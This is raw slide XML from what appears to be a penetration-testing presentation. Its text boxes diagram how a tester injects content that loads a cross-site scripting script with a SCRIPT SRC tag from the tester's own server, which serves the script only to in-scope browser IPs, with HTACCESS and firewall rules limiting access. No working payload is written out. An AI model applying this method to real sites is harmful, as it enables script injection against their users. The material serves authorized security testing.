                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId8" imgW="3135086" imgH="3278319"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189" name="Rectangle 101"/>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7190" name="Group 102"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="228" y="851"/>
              <a:ext cx="334" cy="214"/>
              <a:chOff x="288" y="2254"/>
              <a:chExt cx="528" cy="338"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7191" name="Freeform 103"/>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192" name="Freeform 104"/>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193" name="Freeform 105"/>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194" name="Freeform 106"/>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195" name="Freeform 107"/>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196" name="Freeform 108"/>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197" name="Freeform 109"/>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198" name="Freeform 110"/>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199" name="Freeform 111"/>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00" name="Freeform 112"/>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01" name="Freeform 113"/>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02" name="Freeform 114"/>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03" name="Freeform 115"/>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04" name="Freeform 116"/>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05" name="Freeform 117"/>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06" name="Freeform 118"/>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07" name="Freeform 119"/>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08" name="Freeform 120"/>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09" name="Freeform 121"/>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10" name="Freeform 122"/>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11" name="Freeform 123"/>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12" name="Freeform 124"/>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13" name="Freeform 125"/>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7178" name="Text Box 126"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7056438" y="5189538"/>
            <a:ext cx="8001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br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7179" name="Text Box 127"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="5149850"/>
            <a:ext cx="6350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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Tester</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7180" name="Text Box 128"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6523038" y="3640138"/>
            <a:ext cx="1041400"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p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Web Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7181" name="Text Box 129"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1120775" y="3741738"/>
            <a:ext cx="1089025"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 Tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>'s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Web Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7182" name="Freeform 130"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="812800" y="4083050"/>
            <a:ext cx="4978400" cy="1435100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 3136"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 904"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 3136"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 904"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 3136"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 904"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 3136"/>
              <a:gd name="T7" fmla="*/ 0 h 904"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 3136"/>
              <a:gd name="T13" fmla="*/ 0 h 904"/>
              <a:gd name="T14" fmla="*/ 3136 w 3136"/>
              <a:gd name="T15" fmla="*/ 904 h 904"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="3136" h="904">
                <a:moveTo>
                  <a:pt x="208" y="816"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="104" y="860"/>
                  <a:pt x="0" y="904"/>
                  <a:pt x="256" y="816"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="512" y="728"/>
                  <a:pt x="1264" y="424"/>
                  <a:pt x="1744" y="288"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2224" y="152"/>
                  <a:pt x="2680" y="76"/>
                  <a:pt x="3136" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:schemeClr val="accent2"/>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7183" name="Text Box 131"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="1905000" y="5060950"/>
            <a:ext cx="1676400" cy="11699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1. Inject content that refers to a script on pen tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" b="1" dirty="0"/>
              <a:t>'s web server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7184" name="Freeform 132"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6286500" y="4222750"/>
            <a:ext cx="571500" cy="1003300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 360"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 632"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 360"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 632"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 360"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 632"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 360"/>
              <a:gd name="T10" fmla="*/ 0 h 632"/>
              <a:gd name="T11" fmla="*/ 360 w 360"/>
              <a:gd name="T12" fmla="*/ 632 h 632"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="360" h="632">
                <a:moveTo>
                  <a:pt x="360" y="584"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="292"/>
                  <a:pt x="48" y="0"/>
                  <a:pt x="24" y="8"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="16"/>
                  <a:pt x="108" y="324"/>
                  <a:pt x="216" y="632"/>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7185" name="Text Box 133"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="6629400" y="4257675"/>
            <a:ext cx="2362200" cy="7381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2. Fetch page that refers to script on pen tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" b="1" dirty="0"/>
              <a:t>'s site</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7186" name="Text Box 134"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="4572000" y="5489575"/>
            <a:ext cx="1905000" cy="530225"/>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4. Run XSS … if server provides it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7187" name="Freeform 135"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="3943350"/>
            <a:ext cx="3810000" cy="1739900"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 2400"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 1096"/>
              <a:gd name="T2" fmla="*/ 0 w 2400"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 1096"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 2400"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 1096"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 2400"/>
              <a:gd name="T10" fmla="*/ 0 h 1096"/>
              <a:gd name="T11" fmla="*/ 2400 w 2400"/>
              <a:gd name="T12" fmla="*/ 1096 h 1096"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="2400" h="1096">
                <a:moveTo>
                  <a:pt x="2400" y="856"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1200" y="428"/>
                  <a:pt x="0" y="0"/>
                  <a:pt x="0" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="80"/>
                  <a:pt x="1200" y="588"/>
                  <a:pt x="2400" y="1096"/>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7188" name="Text Box 136"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="2971800" y="3048000"/>
            <a:ext cx="2209800" cy="11699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3. Server code determines if browser IP addr is in scope … if so, delivers XSS attack script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a:xfrm>
            <a:off x="685800" y="153650"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>5) Pen Tester Infrastructure Configuration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8199" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="228600" y="1524000"/>
            <a:ext cx="8839200" cy="1706563"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Injected content loads attack with &lt;SCRIPT SRC&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Infrastructure allows or blocks access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web server configuration with HTACCESS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Infrastructure configuration - Firewall rule sets or web app firewall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8194" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6400800" y="5149850"/>
          <a:ext cx="857250" cy="898525"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s298127" name="Clip" r:id="rId4" imgW="3135086" imgH="3278319" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId4" imgW="3135086" imgH="3278319"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5149850"/>
                        <a:ext cx="857250" cy="8985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8195" name="Object 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5684838" y="3640138"/>
          <a:ext cx="862012" cy="900112"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s298128" name="Clip" r:id="rId6" imgW="3135086" imgH="3278319" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId6" imgW="3135086" imgH="3278319" progId="">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4838" y="3640138"/>
                        <a:ext cx="862012"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8200" name="Group 6"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="4768850"/>
            <a:ext cx="885825" cy="1301750"/>
            <a:chOff x="228" y="851"/>
            <a:chExt cx="334" cy="490"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="8197" name="Object 5"/>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98129" name="Clip" r:id="rId7" imgW="3135086" imgH="3278319" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId7" imgW="3135086" imgH="3278319"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39" name="Rectangle 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8240" name="Group 9"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="228" y="851"/>
              <a:ext cx="334" cy="214"/>
              <a:chOff x="288" y="2254"/>
              <a:chExt cx="528" cy="338"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8241" name="Freeform 1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42" name="Freeform 1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43" name="Freeform 1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44" name="Freeform 1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45" name="Freeform 1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46" name="Freeform 1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47" name="Freeform 1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48" name="Freeform 1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49" name="Freeform 1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50" name="Freeform 1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51" name="Freeform 2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52" name="Freeform 2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53" name="Freeform 2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54" name="Freeform 2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55" name="Freeform 2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56" name="Freeform 2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57" name="Freeform 2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58" name="Freeform 2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59" name="Freeform 2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60" name="Freeform 2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61" name="Freeform 3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62" name="Freeform 3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63" name="Freeform 3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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8201" name="Group 33"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="3473450"/>
            <a:ext cx="885825" cy="1301750"/>
            <a:chOff x="228" y="851"/>
            <a:chExt cx="334" cy="490"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="8196" name="Object 4"/>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98130" name="Clip" r:id="rId8" imgW="3135086" imgH="3278319" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId8" imgW="3135086" imgH="3278319"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4" name="Rectangle 35"/>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8215" name="Group 36"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="228" y="851"/>
              <a:ext cx="334" cy="214"/>
              <a:chOff x="288" y="2254"/>
              <a:chExt cx="528" cy="338"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8216" name="Freeform 37"/>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17" name="Freeform 38"/>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18" name="Freeform 39"/>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19" name="Freeform 40"/>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20" name="Freeform 41"/>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21" name="Freeform 42"/>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22" name="Freeform 43"/>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23" name="Freeform 44"/>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24" name="Freeform 45"/>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25" name="Freeform 46"/>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26" name="Freeform 47"/>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27" name="Freeform 48"/>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28" name="Freeform 49"/>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29" name="Freeform 50"/>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30" name="Freeform 51"/>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31" name="Freeform 52"/>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32" name="Freeform 53"/>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33" name="Freeform 54"/>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34" name="Freeform 55"/>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35" name="Freeform 56"/>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36" name="Freeform 57"/>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37" name="Freeform 58"/>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38" name="Freeform 59"/>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8202" name="Text Box 60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7056438" y="5341938"/>
            <a:ext cx="8001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br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8203" name="Text Box 61"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="5302250"/>
            <a:ext cx="6350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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Tester</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8204" name="Text Box 62"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6523038" y="3792538"/>
            <a:ext cx="1041400"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p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Web Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8205" name="Text Box 63"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1120775" y="3894138"/>
            <a:ext cx="1089025"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 Tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>'s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Web Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8206" name="Freeform 64"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="812800" y="4235450"/>
            <a:ext cx="4978400" cy="1435100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 3136"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 904"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 3136"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 904"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 3136"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 904"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 3136"/>
              <a:gd name="T7" fmla="*/ 0 h 904"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 3136"/>
              <a:gd name="T13" fmla="*/ 0 h 904"/>
              <a:gd name="T14" fmla="*/ 3136 w 3136"/>
              <a:gd name="T15" fmla="*/ 904 h 904"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="3136" h="904">
                <a:moveTo>
                  <a:pt x="208" y="816"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="104" y="860"/>
                  <a:pt x="0" y="904"/>
                  <a:pt x="256" y="816"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="512" y="728"/>
                  <a:pt x="1264" y="424"/>
                  <a:pt x="1744" y="288"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2224" y="152"/>
                  <a:pt x="2680" y="76"/>
                  <a:pt x="3136" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:schemeClr val="accent2"/>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8207" name="Text Box 65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="1905000" y="5213350"/>
            <a:ext cx="1676400" cy="11699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1. Inject content that refers to a script on pen tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" b="1" dirty="0"/>
              <a:t>'s web server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8208" name="Freeform 66"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6286500" y="4375150"/>
            <a:ext cx="571500" cy="1003300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 360"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 632"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 360"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 632"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 360"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 632"/>
